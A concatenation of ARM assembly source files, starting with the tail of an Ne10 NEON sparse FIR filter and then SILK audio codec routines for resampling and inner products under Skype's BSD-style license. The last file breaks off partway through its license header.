VMLA qAcc0,qInp,qCoeff
VLD1 {dInp_0,dInp_1},[pX]!
SUBS blkCnt,#4
VST1 {dAcc0_0,dAcc0_1},[pOut]!
VLD1 {dAcc0_0,dAcc0_1},[pOut]
BGE firSparseInnerLoop1
firSparseEndInnerLoop1:
ADDS blkCnt,#4
@/* If the blockSize is not a multiple of 4,
@* * compute the remaining samples */
VMOV qMask,qMaskTmp
VBSL qMask,qInp,qZero
VMLA qAcc0,qMaskF32,qCoeff
VST1 {dAcc0_0,dAcc0_1},[pOut]
ADD pOut,pOut,blkCnt,LSL #2
LDR readIndex,[pTapDelay],#4
ADD readIndex,readIndex,blockSize
SUBS readIndex,stateIndex,readIndex
@/*Wrap arround index*/
IT LT
ADDLT readIndex,readIndex,delaySize
SUBS numTaps,#1
BGT firSparseOuterLoop
firSparseEnd:
@// Return From Function
POP {r0,r4-r11,pc}
@/*ARM Registers*/
.unreq pStateStruct
.unreq pSrc
.unreq pDst
.unreq pScratch
.unreq blockSize
.unreq size2
.unreq pYtmp1
.unreq pOut
.unreq Offset
.unreq readIndex
.unreq numTaps
.unreq pState
.unreq pCoeffs
.unreq stateIndex
.unreq maxDelay
.unreq delaySize
.unreq pTapDelay
.unreq blkCnt
.unreq size1
.unreq temp
.unreq pTemp
.unreq mask
.unreq pMask
.unreq pX
.unreq pY
.unreq pYtmp2
@/*NEON variale Declaration*/
.unreq qInp
.unreq dInp_0
.unreq dInp_1
.unreq qCoeff
.unreq dCoeff_0
.unreq dCoeff_1
.unreq qZero
.unreq qMask
.unreq qMaskF32
.unreq dMask_0
.unreq dMask_1
.unreq qAcc0
.unreq dAcc0_0
.unreq dAcc0_1
.unreq qTemp
.unreq dTemp_0
.unreq dTemp_1
.unreq qMaskTmp
.unreq dMaskTmp_0
.unreq dMaskTmp_1
#ifdef __PIC__
@/*GOT trampoline values*/
.align 4
.L_PIC0_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC0+4)
.L_PIC1_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC1+4)
.L_PIC2_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC2+4)
.L_PIC3_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC3+4)
.L_PIC4_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC4+4)
.L_PIC5_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC5+4)
.L_PIC6_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC6+4)
.L_GOT_ne10_qMaskTable32:
.word ne10_qMaskTable32(GOT)
.L_GOT_ne10_divLookUpTable:
.word ne10_divLookUpTable(GOT)
#endif
.end
#endif
@/* ENABLE_NE10_FIR_SPARSE_FLOAT_NEON */
|
open-vela/external_silk-v3-decoder | 3,564 | silk/src/SKP_Silk_resampler_private_IIR_FIR_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
VARDEF ind, r4
VARDEF tab1, r5
VARDEF tab2, r6
VARDEF tab3, _r7
VARDEF val1, r8
VARDEF val2, sb
VARDEF val3, r2
VARDEF val4, r3
VARDEF tmp1, sl
VARDEF tmp2, r2
VARDEF tmp3, r3
VARDEF tmp4, ip
VARDEF out, sl
.set sp_max_i, 0
.set sp_inc, 4
EXTERN SYM(SKP_Silk_resampler_frac_FIR_144_alt)
.globl SYM(SKP_Silk_resampler_private_IIR_FIR_INTERPOL)
SYM(SKP_Silk_resampler_private_IIR_FIR_INTERPOL):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #8
str r2, [sp, #sp_max_i]
str r3, [sp, #sp_inc]
cmp r2, #0
mov tmp3, #0xFF00
mov ind, #0
ble LR(1, f)
add tmp3, tmp3, #0xFF
L(0)
ldr tmp1, TABLE(L0, =SKP_Silk_resampler_frac_FIR_144_alt)
and tmp3, ind, tmp3
mov tmp2, #144
mov tmp4, ind, asr #16
smulwb tmp2, tmp3, tmp2
add tmp1, tmp1, tmp2, lsl #3
add tmp1, tmp1, tmp2, lsl #2
add tmp4, r1, tmp4, lsl #1
ldmia tmp1, {tab1, tab2, tab3}
ldrsh val1, [tmp4], #2
ldrsh val2, [tmp4], #2
ldrsh val3, [tmp4], #2
ldrsh val4, [tmp4], #2
smulbb out, val1, tab1
smlabt out, val2, tab1, out
ldrsh val1, [tmp4], #2
ldrsh val2, [tmp4]
smlabb out, val3, tab2, out
smlabt out, val4, tab2, out
ldr r2, [sp, #sp_max_i]
ldr r3, [sp, #sp_inc]
smlabb out, val1, tab3, out
smlabt out, val2, tab3, out
add ind, ind, r3
adds out, out, #1<<14
mov tmp3, #0xFF00
#ifdef _WINRT
bvc LR(2, f)
mvn out, #0x80000000
b LR(3, f)
L(2)
qadd out, out, out
L(3)
#else
mvnvs out, #0x80000000
qaddvc out, out, out
#endif
add tmp3, tmp3, #0xFF
mov out, out, asr #16
cmp ind, r2
strh out, [r0], #2
blt LR(0, b)
L(1)
add sp, sp, #8
ldmia sp!, {r4-r10, fp, ip, pc}
L(L0)
DCD SYM(SKP_Silk_resampler_frac_FIR_144_alt)
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 15,326 | silk/src/SKP_Silk_inner_prod_aligned_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if ( EMBEDDED_ARM >= 7 )
VARDEF len32, r3
VARDEF len32tmp, lr
VARDEF ptr1, r2
VARDEF ptr2, r1
VARDEF tmp1, r4
VARDEF tmp2, r5
VARDEFD val_0, d0
VARDEFD val_1, d1
VARDEFD val_2, d2
VARDEFD val_3, d3
VARDEFQ sum_tmp1, q2
VARDEFQ sum_tmp2, q3
VARDEFD sum_tmp1_lo, d4
VARDEFD sum_tmp1_hi, d5
.globl SYM(SKP_Silk_inner_prod_aligned)
SYM(SKP_Silk_inner_prod_aligned):
stmdb sp!, {r4-r10, fp, ip, lr}
vpush {q0-q7}
add fp, sp, #164
mov len32, r2 // put length into r3
mov ptr1, r0 // put in1 to r2
mov r0, #0 // put result to r0
// USE SL8D, SI4D
L(2)
cmp len32, #24
and len32tmp, len32, #0x7
blt LR(3, f)
vmov.i32 sum_tmp1, #0
vld1.16 {val_0, val_1}, [ptr2]!
vld1.16 {val_2, val_3}, [ptr1]!
vmov.i32 sum_tmp2, #0 // Set Q2, Q3 to 0
sub len32, len32, #16
L(0)
subs len32, len32, #8
vmlal.s16 sum_tmp1, val_0, val_2
vmlal.s16 sum_tmp2, val_1, val_3
vld1.16 {val_0, val_1}, [ptr2]!
vld1.16 {val_2, val_3}, [ptr1]!
bge LR(0, b)
vmlal.s16 sum_tmp1, val_0, val_2
vmlal.s16 sum_tmp2, val_1, val_3
vadd.s32 sum_tmp1, sum_tmp1, sum_tmp2
vadd.s32 val_0, sum_tmp1_lo, sum_tmp1_hi
vmov tmp1, tmp2, val_0
cmp len32tmp, #0 // Check if length%4 == 0
add r0, r0, tmp1
add r0, r0, tmp2
bgt LR(1, f) // Jump to process the reminder
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEFQ sum_tmp3, q1
VARDEFD sum_tmp3_lo, d2
VARDEFD sum_tmp3_hi, d3
// USE SL4D, SI4D
L(3)
cmp len32, #12
and len32tmp, len32, #0x3
movlt len32tmp, len32 // if length is not enough for SIMD.
blt LR(1, f)
vld1.16 val_0, [ptr2]!
vld1.16 val_1, [ptr1]!
vmov.i32 sum_tmp3, #0
sub len32, len32, #8
L(0)
subs len32, len32, #4
vmlal.s16 sum_tmp3, val_0, val_1
vld1.16 val_0, [ptr2]!
vld1.16 val_1, [ptr1]!
bge LR(0, b)
vmlal.s16 sum_tmp3, val_0, val_1
vadd.s32 val_0, sum_tmp3_lo, sum_tmp3_hi
vmov tmp1, tmp2, val_0
cmp len32tmp, #0 // Check if length%4 == 0
add r0, r0, tmp1
add r0, r0, tmp2
bgt LR(1, f) // Jump to process the reminder
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEF tmp0, r3
L(1)
subs len32tmp, len32tmp, #1
ldrsh tmp0, [ptr2], #2
ldrsh tmp1, [ptr1], #2
beq LR(2, f)
L(0)
smlabb r0, tmp0, tmp1, r0
ldrsh tmp0, [ptr2], #2
ldrsh tmp1, [ptr1], #2
subs len32tmp, len32tmp, #1
bgt LR(0, b)
L(2)
smlabb r0, tmp0, tmp1, r0
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEF len64, r4
VARDEF len64tmp, lr
VARDEF ptr00, r2
VARDEF ptr01, r3
VARDEFD val0, d0
VARDEFD val1, d1
VARDEFD val2, d2
VARDEFD val3, d3
VARDEFQ mul0, q2
VARDEFD mul0_lo, d4
VARDEFD mul0_hi, d5
VARDEFQ mul1, q3
VARDEFD mul1_lo, d6
VARDEFD mul1_hi, d7
VARDEFQ accu0, q4
VARDEFD accu0_lo, d8
VARDEFD accu0_hi, d9
VARDEFQ accu1, q5
VARDEFD accu1_lo, d10
VARDEFD accu1_hi, d11
.globl SYM(SKP_Silk_inner_prod16_aligned_64)
SYM(SKP_Silk_inner_prod16_aligned_64):
stmdb sp!, {r4-r10, fp, ip, lr}
vpush {q0-q7}
add fp, sp, #164
mov len64, r2
mov ptr00, r0
mov ptr01, r1
mov r0, #0 /*Output*/
mov r1, #0
// USE SL8D, SI4D
L(2)
cmp len64, #24
and len64tmp, len64, #0x7
blt LR(3, f)
vld1.16 {val0, val1}, [ptr00]!
vld1.16 {val2, val3}, [ptr01]!
vmov accu0_lo, r0, r1
vmov accu0_hi, r0, r1
vmov accu1, accu0
sub len64, len64, #16
L(0)
vmull.s16 mul0, val0, val2
vmull.s16 mul1, val1, val3
vld1.16 {val0, val1}, [ptr00]!
subs len64, len64, #8
//vqadd.s32 mul0, mul0, mul1
vld1.16 {val2, val3}, [ptr01]!
vaddw.s32 accu0, accu0, mul0_lo
vaddw.s32 accu1, accu1, mul0_hi
vaddw.s32 accu0, accu0, mul1_lo
vaddw.s32 accu1, accu1, mul1_hi
bge LR(0, b)
vmull.s16 mul0, val0, val2
vmull.s16 mul1, val1, val3
//vqadd.s32 mul0, mul0, mul1
vaddw.s32 accu0, accu0, mul0_lo
vaddw.s32 accu1, accu1, mul0_hi
vaddw.s32 accu0, accu0, mul1_lo
vaddw.s32 accu1, accu1, mul1_hi
vqadd.s64 accu0, accu0, accu1
vqadd.s64 accu0_lo, accu0_lo, accu0_hi
vmov r0, r1, accu0_lo
cmp len64tmp, #0 // Check if length%4 == 0
bgt LR(1, f) // Jump to process the reminder
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEFQ mul2, q1
VARDEFD mul2_lo, d2
VARDEFD mul2_hi, d3
VARDEFQ accu2, q2
VARDEFD accu2_lo, d4
VARDEFD accu2_hi, d5
VARDEFQ accu3, q3
// USE SL4D, SI4D
L(3)
cmp len64, #12
and len64tmp, len64, #0x3
movlt len64tmp, len64 // if length is not enough for SIMD.
blt LR(1, f)
vld1.16 val0, [ptr00]!
vld1.16 val1, [ptr01]!
vmov accu2_lo, r0, r1
vmov accu2_hi, r0, r1
vmov accu3, accu2
sub len64, len64, #8
L(0)
vmull.s16 mul2, val0, val1
vld1.16 val0, [ptr00]!
subs len64, len64, #4
vaddw.s32 accu2, accu2, mul2_lo
vld1.16 val1, [ptr01]!
vaddw.s32 accu3, accu3, mul2_hi
bge LR(0, b)
vmull.s16 mul2, val0, val1
vaddw.s32 accu2, accu2, mul2_lo
vaddw.s32 accu3, accu3, mul2_hi
vqadd.s64 accu2, accu2, accu3
vqadd.s64 accu2_lo, accu2_lo, accu2_hi
vmov r0, r1, accu2_lo
cmp len64tmp, #0
bgt LR(1, f)
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEF val4, r4
VARDEF val5, r5
L(1)
subs len64tmp, len64tmp, #1
ldrsh val4, [ptr00], #2
ldrsh val5, [ptr01], #2
beq LR(2, f)
L(0)
smlalbb r0, r1, val4, val5
ldrsh val4, [ptr00], #2
ldrsh val5, [ptr01], #2
subs len64tmp, len64tmp, #1
bgt LR(0, b)
L(2)
smlalbb r0, r1, val4, val5
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
#elif EMBEDDED_ARM >=5
/*
* SKP_Silk_inner_prod_aligned(val1_16bit[], val2_16bit[], len)
*
* Known issue:
* 1. val1_16bit and val2_16bit needs to be 16bit aligned.
* 2. result is in 32bit, no saturation, wrap around instead.
*/
VARDEF sum, r0
VARDEF val_p1, r1
VARDEF val_p2, r2
VARDEF len, r3
VARDEF val1, r4
VARDEF val2, r5
VARDEF val3, r6
#ifdef IPHONE
VARDEF val4, r8
VARDEF tmp, sb
VARDEF val5, sl
VARDEF val6, _r7
VARDEF val7, lr
VARDEF val8, ip
#else
VARDEF val4, _r7
VARDEF tmp, r8
VARDEF val5, sb
VARDEF val6, sl
VARDEF val7, lr
VARDEF val8, ip
#endif
.globl SYM(SKP_Silk_inner_prod_aligned)
SYM(SKP_Silk_inner_prod_aligned):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
cmp r2, #14
blt LR(9, f)/*LenLessThan14*/
ands tmp, r2, #1 /*check if len is a even number*/
mov len, r2
mov val_p2, r0
mov sum, #0
beq LR(0, f)/*LenEven*/
ldrsh val3, [val_p1], #2
ldrsh val4, [val_p2], #2
sub len, len, #1
smulbb sum, val3, val4
/*LenEven:*/
L(0)
ands val1, val_p1, #2 /*Check if val_p1 is LR(4, B) aligned.*/
bgt LR(1, f)/*R1Odd*/
ands val2, val_p2, #2 /*Check if val_p2 is LR(4, B) aligned*/
bgt LR(2, f)/*R2Odd*/
/*R1R2Even:*/
ands tmp, len, #3
beq LR(4, f)/*Len4*/
sub len, len, #2
ldr val1, [val_p1], #4
ldr val2, [val_p2], #4
SKP_SMLAD sum, val1, val2, sum
L(4)/*Len4:*/
ands tmp, len, #7
beq LR(8, f)/*Len8*/
ldmia val_p1!, {val1, val3}
ldmia val_p2!, {val2, val4}
sub len, len, #4
SKP_SMLAD sum, val1, val2, sum
SKP_SMLAD sum, val3, val4, sum
L(8)/*Len8:*/
ldmia val_p1!, {val1, val3, val5, val7}
ldmia val_p2!, {val2, val4, val6, val8}
L(0)
subs len, len, #8
SKP_SMLAD sum, val1, val2, sum
SKP_SMLAD sum, val3, val4, sum
SKP_SMLAD sum, val5, val6, sum
SKP_SMLAD sum, val7, val8, sum
ldmgtia val_p1!, {val1, val3, val5, val7}
ldmgtia val_p2!, {val2, val4, val6, val8}
bgt LR(0, b)
ldmia sp!, {r4-r10, fp, ip, pc}
L(2)/*R2Odd:*/
ands tmp, len, #3
beq LR(6, f)/*Len4R2Odd*/
ldr val1, [val_p1], #4
ldrsh val3, [val_p2], #2
ldrsh val4, [val_p2], #2 /*make val_p2 even*/
sub len, len, #2
smlabb sum, val1, val3, sum
smlatb sum, val1, val4, sum
L(6)/*Len4R2Odd:*/
sub len, len, #4
ldrsh tmp, [val_p2], #2 /*make val_p2 even*/
ldmia val_p1!, {val1, val3}
ldmia val_p2!, {val2, val4}
mov tmp, tmp, lsl #16
L(0)
subs len, len, #4
smlabt sum, val1, tmp, sum
smlatb sum, val1, val2, sum
smlabt sum, val3, val2, sum
smlatb sum, val3, val4, sum
mov tmp, val4
ldmia val_p1!, {val1, val3}
ldmia val_p2!, {val2, val4}
bgt LR(0, b)
smlabt sum, val1, tmp, sum
smlatb sum, val1, val2, sum
smlabt sum, val3, val2, sum
smlatb sum, val3, val4, sum
ldmia sp!, {r4-r10, fp, ip, pc}
L(1)/*R1Odd:*/
ands val2, val_p2, #2 /*Check if val_p2 is LR(4, B) aligned*/
bgt LR(3, f)/*R1R2Odd*/
ands tmp, len, #3
beq LR(5, f)/*Len4R1Odd*/
ldrsh val1, [val_p1], #2
ldrsh val2, [val_p1], #2
ldr val3, [val_p2], #4 /*make val_p2 even*/
sub len, len, #2
smlabb sum, val1, val3, sum
smlabt sum, val2, val3, sum
L(5)/*Len4R1Odd:*/
sub len, len, #4
ldrsh tmp, [val_p1], #2 /*make val_p2 even*/
ldmia val_p1!, {val1, val3}
ldmia val_p2!, {val2, val4}
mov tmp, tmp, lsl #16
L(0)
subs len, len, #4
smlatb sum, tmp, val2, sum
smlabt sum, val1, val2, sum
smlatb sum, val1, val4, sum
smlabt sum, val3, val4, sum
mov tmp, val3
ldmia val_p1!, {val1, val3}
ldmia val_p2!, {val2, val4}
bgt LR(0, b)
smlatb sum, tmp, val2, sum
smlabt sum, val1, val2, sum
smlatb sum, val1, val4, sum
smlabt sum, val3, val4, sum
ldmia sp!, {r4-r10, fp, ip, pc}
L(3)/*R1R2Odd:*/
sub len, len, #4
ldrsh val3, [val_p1], #2
ldrsh val4, [val_p2], #2
ldr val1, [val_p1], #4
ldr val2, [val_p2], #4
smlabb sum, val3, val4, sum
L(0)
subs len, len, #2
SKP_SMLAD sum, val1, val2, sum
ldr val1, [val_p1], #4
ldr val2, [val_p2], #4
bgt LR(0, b)
ldrsh val3, [val_p1], #2
ldrsh val4, [val_p2], #2
SKP_SMLAD sum, val1, val2, sum
smlabb sum, val3, val4, sum
ldmia sp!, {r4-r10, fp, ip, pc}
L(9)/*LenLessThan14:*/
mov len, r2
mov val_p2, r0
mov sum, #0
L(0)
ldrsh val1, [val_p1], #2
ldrsh val2, [val_p2], #2
subs len, len, #1
smlabb sum, val1, val2, sum
bgt LR(0, b)
ldmia sp!, {r4-r10, fp, ip, pc}
/*
* SKP_Silk_inner_prod16_aligned_64(val1_16bit[], val2_16bit[], len)
*
* Known issue:
* 1. val1_16bit and val2_16bit needs to be 16bit aligned.
* 2. result is in 64bit.
*/
// only redefine those registers.
VARDEF sumLo, r0
VARDEF sumHi, r1
#ifdef IPHONE
VARDEF val_p3, sl
VARDEF val_5, sb
VARDEF val_6, _r7
VARDEF val_7, lr
VARDEF val_8, ip
#else
VARDEF val_p3, sb
VARDEF val_5, r8
VARDEF val_6, sl
VARDEF val_7, lr
VARDEF val_8, ip
#endif
.globl SYM(SKP_Silk_inner_prod16_aligned_64)
SYM(SKP_Silk_inner_prod16_aligned_64):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
cmp r2, #14
blt LR(9, f)/*LenLessThan14_64*/
ands tmp, r2, #1 /*check if len is a even number*/
mov len, r2
mov val_p2, r0
mov val_p3, r1
mov sumLo, #0
mov sumHi, #0
beq LR(0, f)/*LenEven64*/
ldrsh val3, [val_p3], #2
ldrsh val4, [val_p2], #2
sub len, len, #1
smlalbb sumLo, sumHi, val3, val4
L(0)/*LenEven64:*/
ands val1, val_p3, #2 /*Check if val_p3 is LR(4, B) aligned.*/
bgt LR(1, f)/*R1Odd64*/
ands val2, val_p2, #2 /*Check if val_p2 is LR(4, B) aligned*/
bgt LR(2, f)/*R2Odd64*/
/*R1R2Even64:*/
ands tmp, len, #3
beq LR(4, f)/*Len464*/
sub len, len, #2
ldr val1, [val_p3], #4
ldr val2, [val_p2], #4
SKP_SMLALD sumLo, sumHi, val1, val2
L(4)/*Len464:*/
ands tmp, len, #7
beq LR(8, f)/*Len864*/
sub len, len, #4
ldmia val_p3!, {val1, val3}
ldmia val_p2!, {val2, val4}
SKP_SMLALD sumLo, sumHi, val1, val2
SKP_SMLALD sumLo, sumHi, val3, val4
L(8)/*Len864:*/
ldmia val_p3!, {val1, val3, val_5, val_7}
ldmia val_p2!, {val2, val4, val_6, val_8}
L(0)
subs len, len, #8
SKP_SMLALD sumLo, sumHi, val1, val2
SKP_SMLALD sumLo, sumHi, val3, val4
SKP_SMLALD sumLo, sumHi, val_5, val_6
SKP_SMLALD sumLo, sumHi, val_7, val_8
ldmgtia val_p3!, {val1, val3, val_5, val_7}
ldmgtia val_p2!, {val2, val4, val_6, val_8}
bgt LR(0, b)
ldmia sp!, {r4-r10, fp, ip, pc}
L(2)/*R2Odd64:*/
sub len, len, #2
sub val_p2, val_p2, #2 /*make val_p2 even*/
ldr val1, [val_p3], #4
ldr val3, [val_p2], #4
ldr val2, [val_p2], #4
L(0)
subs len, len, #2
smlalbt sumLo, sumHi, val1, val3
smlaltb sumLo, sumHi, val1, val2
mov val3, val2
ldr val1, [val_p3], #4
ldr val2, [val_p2], #4
bgt LR(0, b)
smlalbt sumLo, sumHi, val1, val3
smlaltb sumLo, sumHi, val1, val2
ldmia sp!, {r4-r10, fp, ip, pc}
L(1)/*R1Odd64:*/
ands val2, r2, #2 /*Check if val_p2 is LR(4, B) aligned*/
bgt LR(3, f)/*R1R2Odd64*/
sub len, len, #2
sub val_p3, val_p3, #2 /*make val_p3 even*/
ldr val3, [val_p3], #4
ldr val1, [val_p3], #4
ldr val2, [val_p2], #4
L(0)
subs len, len, #2
smlaltb sumLo, sumHi, val3, val2
smlalbt sumLo, sumHi, val1, val2
mov val3, val1
ldr val1, [val_p3], #4
ldr val2, [val_p2], #4
bgt LR(0, b)
smlaltb sumLo, sumHi, val3, val2
smlalbt sumLo, sumHi, val1, val2
ldmia sp!, {r4-r10, fp, ip, pc}
L(3)/*R1R2Odd64:*/
sub len, len, #4
ldrsh val3, [val_p3], #2
ldrsh val4, [val_p2], #2
ldr val1, [val_p3], #4
ldr val2, [val_p2], #4
smlalbb sumLo, sumHi, val3, val4
L(0)
subs len, len, #2
SKP_SMLALD sumLo, sumHi, val1, val2
ldr val1, [val_p3], #4
ldr val2, [val_p2], #4
bgt LR(0, b)
ldrsh val3, [val_p3], #2
ldrsh val4, [val_p2], #2
SKP_SMLALD sumLo, sumHi, val1, val2
smlalbb sumLo, sumHi, val3, val4
ldmia sp!, {r4-r10, fp, ip, pc}
L(9)/*LenLessThan14_64:*/
mov len, r2
mov val_p2, r0
mov val_p3, r1
mov sumLo, #0
mov sumHi, #0
L(0)
ldrsh val1, [val_p3], #2
ldrsh val2, [val_p2], #2
subs len, len, #1
smlalbb sumLo, sumHi, val1, val2
bgt LR(0, b)
ldmia sp!, {r4-r10, fp, ip, pc}
#endif
END
#endif
|
open-vela/external_silk-v3-decoder | 3,460 | silk/src/SKP_Silk_resampler_down2_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
#define SKP_Silk_resampler_down2_0 0x2690
#define SKP_Silk_resampler_down2_1 0x9B81
VARDEF xy0, r4
VARDEF xy1, r5
VARDEF down2_coefs, _r7
VARDEF S_0, r6
VARDEF S_1, r8
VARDEF in0, sb
VARDEF in1, sl
VARDEF out32, r0
.set sp_S, 0
.globl SYM(SKP_Silk_resampler_down2)
SYM(SKP_Silk_resampler_down2):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #4
ldrsh in0, [r2], #2 // Avoid un-aligned access
ldrsh in1, [r2], #2
str r0, [sp, #sp_S]
ldmia r0, {S_0, S_1}
mov down2_coefs, #0x26000000
add down2_coefs, down2_coefs, #0x900000
add down2_coefs, down2_coefs, #0x9B00
add down2_coefs, down2_coefs, #0x81
mov r3, r3, asr #1
mov ip, #1024
L(0)
add out32, S_0, S_1
rsb xy0, S_0, in0, lsl #10
rsb xy1, S_1, in1, lsl #10
smlawb xy0, xy0, down2_coefs, xy0
smulwt xy1, xy1, down2_coefs
add out32, out32, xy0
add S_0, xy0, in0, lsl #10
add out32, out32, xy1
add S_1, xy1, in1, lsl #10
#if EMBEDDED_ARM>=6
qadd out32, out32, ip
subs r3, r3, #1
ssat out32, #16, out32, asr #11
#ifdef _WINRT
ble LR(1, f)
ldrsh in0, [r2], #2
ldrsh in1, [r2], #2
L(1)
#else
ldrgtsh in0, [r2], #2
ldrgtsh in1, [r2], #2
#endif
#else
qadd out32, out32, ip
cmp out32, #0x4000000
movge out32, #0x4000000
subge out32, out32, #1
cmn out32, #0x4000000
movlt out32, #0x4000000
subs r3, r3, #1
mov out32, out32, asr #11
ldrgtsh in0, [r2], #2
ldrgtsh in1, [r2], #2
#endif
strh out32, [r1], #2
bgt LR(0, b)
ldr r0, [sp, #sp_S]
stmia r0, {S_0, S_1}
add sp, sp, #4
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 3,431 | silk/src/SKP_Silk_sum_sqr_shift_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
